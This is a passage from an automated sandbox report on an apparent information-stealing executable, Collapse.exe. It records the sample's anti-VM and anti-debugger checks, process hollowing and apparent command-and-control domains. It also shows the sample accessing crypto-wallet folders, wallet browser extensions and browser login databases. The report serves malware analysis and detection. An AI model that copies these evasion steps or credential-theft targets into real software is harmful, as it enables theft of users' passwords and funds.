                Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"
                Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"
                Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"
                Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Collapse.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_0098E75A push ecx; ret 0_2_0098E76D
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_0098E75A push ecx; ret 3_2_0098E76D
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00446870 push edi; ret 6_2_00446871
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00433AFE push eax; mov dword ptr [esp], eax6_2_00433AFF
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043F530 push eax; mov dword ptr [esp], E1CAE11Dh6_2_0043F535
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043C5D0 push eax; mov dword ptr [esp], 77987799h6_2_0043C5DE
                Source: C:\Users\user\Desktop\Collapse.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Collapse.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Collapse.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exe TID: 6384Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exe TID: 6256Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_009A0CF8 FindFirstFileExW,0_2_009A0CF8
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_009A0DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_009A0DA9
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_009A0CF8 FindFirstFileExW,3_2_009A0CF8
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_009A0DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_009A0DA9
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: Collapse.exe, 00000006.00000003.1688591837.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1447418563.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688159830.0000000000F6C000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1375521268.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000002.1689170640.0000000000F70000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688159830.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1290803924.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1403986170.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000002.1689263153.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1374794026.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688424834.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: Collapse.exe, 00000006.00000003.1317786534.00000000036E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\Collapse.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_0043E0F0 LdrInitializeThunk,6_2_0043E0F0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_009972FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009972FD
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_009B619E mov edi, dword ptr fs:[00000030h]0_2_009B619E
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_00981690 mov edi, dword ptr fs:[00000030h]0_2_00981690
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_00981690 mov edi, dword ptr fs:[00000030h]3_2_00981690
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_0099C705 GetProcessHeap,0_2_0099C705
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_0098E06C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0098E06C
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_009972FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009972FD
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_0098E42C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0098E42C
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_0098E420 SetUnhandledExceptionFilter,0_2_0098E420
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_0098E06C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0098E06C
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_009972FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_009972FD
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_0098E42C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0098E42C
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 3_2_0098E420 SetUnhandledExceptionFilter,3_2_0098E420

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_009B619E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_009B619E
                Source: C:\Users\user\Desktop\Collapse.exeMemory written: C:\Users\user\Desktop\Collapse.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Collapse.exe, 00000000.00000002.1245828484.00000000027ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
                Source: Collapse.exe, 00000000.00000002.1245828484.00000000027ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
                Source: Collapse.exe, 00000000.00000002.1245828484.00000000027ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
                Source: Collapse.exe, 00000000.00000002.1245828484.00000000027ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
                Source: Collapse.exe, 00000000.00000002.1245828484.00000000027ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
                Source: Collapse.exe, 00000000.00000002.1245828484.00000000027ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
                Source: Collapse.exe, 00000000.00000002.1245828484.00000000027ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
                Source: Collapse.exe, 00000000.00000002.1245828484.00000000027ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
                Source: Collapse.exe, 00000000.00000002.1245828484.00000000027ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: observerfry.lat
                Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 6_2_00438430 cpuid 6_2_00438430
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetLocaleInfoW,0_2_009A08CD
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_009A0062
                Source: C:\Users\user\Desktop\Collapse.exeCode function: EnumSystemLocalesW,0_2_009A02B3
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetLocaleInfoW,0_2_0099BA4C
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_009A034E
                Source: C:\Users\user\Desktop\Collapse.exeCode function: EnumSystemLocalesW,0_2_009A05A1
                Source: C:\Users\user\Desktop\Collapse.exeCode function: EnumSystemLocalesW,0_2_009A06D5
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetLocaleInfoW,0_2_009A0600
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_009A07C7
                Source: C:\Users\user\Desktop\Collapse.exeCode function: EnumSystemLocalesW,0_2_0099BFF0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetLocaleInfoW,0_2_009A0720
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetLocaleInfoW,3_2_009A08CD
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_009A0062
                Source: C:\Users\user\Desktop\Collapse.exeCode function: EnumSystemLocalesW,3_2_009A02B3
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetLocaleInfoW,3_2_0099BA4C
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_009A034E
                Source: C:\Users\user\Desktop\Collapse.exeCode function: EnumSystemLocalesW,3_2_009A05A1
                Source: C:\Users\user\Desktop\Collapse.exeCode function: EnumSystemLocalesW,3_2_009A06D5
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetLocaleInfoW,3_2_009A0600
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_009A07C7
                Source: C:\Users\user\Desktop\Collapse.exeCode function: EnumSystemLocalesW,3_2_0099BFF0
                Source: C:\Users\user\Desktop\Collapse.exeCode function: GetLocaleInfoW,3_2_009A0720
                Source: C:\Users\user\Desktop\Collapse.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_0098EB50 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_0098EB50
                Source: C:\Users\user\Desktop\Collapse.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Collapse.exe, 00000006.00000003.1403986170.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1403631246.000000000101C000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1404122051.0000000000F84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Collapse.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Collapse.exe PID: 5924, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Collapse.exe, 00000006.00000003.1375521268.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                Source: Collapse.exe, 00000006.00000003.1375521268.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: Collapse.exe, 00000006.00000003.1369666882.00000000036AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                Source: Collapse.exe, 00000006.00000003.1374890812.0000000000F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Collapse.exe, 00000006.00000003.1375521268.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Collapse.exe, 00000006.00000003.1375521268.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Collapse.exe, 00000006.00000003.1374890812.0000000000F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: Collapse.exe, 00000006.00000003.1374794026.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Collapse.exe, 00000006.00000003.1375045759.0000000000F7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
